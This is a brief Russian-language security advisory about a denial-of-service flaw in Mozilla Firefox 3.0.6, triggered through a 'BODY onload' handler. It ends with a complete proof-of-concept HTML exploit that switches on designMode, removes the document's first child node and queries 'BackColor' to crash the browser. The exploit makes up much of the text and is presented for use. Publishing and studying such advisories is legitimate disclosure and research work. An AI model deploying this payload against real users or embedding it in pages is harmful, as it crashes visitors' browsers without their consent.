Программа: Mozilla Firefox 3.0.6
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую
систему. Уязвимость существует из-за ошибки в проверке входных данных при
обработке тегов «BODY onload». Атакующий может передать специально
сформированные данные, что приведет к отказу системы в обслуживании.
Эксплоит:
<BODY onload="
document.designMode='on';//string
document.removeChild(document.firstChild);//object
document.queryCommandState('BackColor');
">
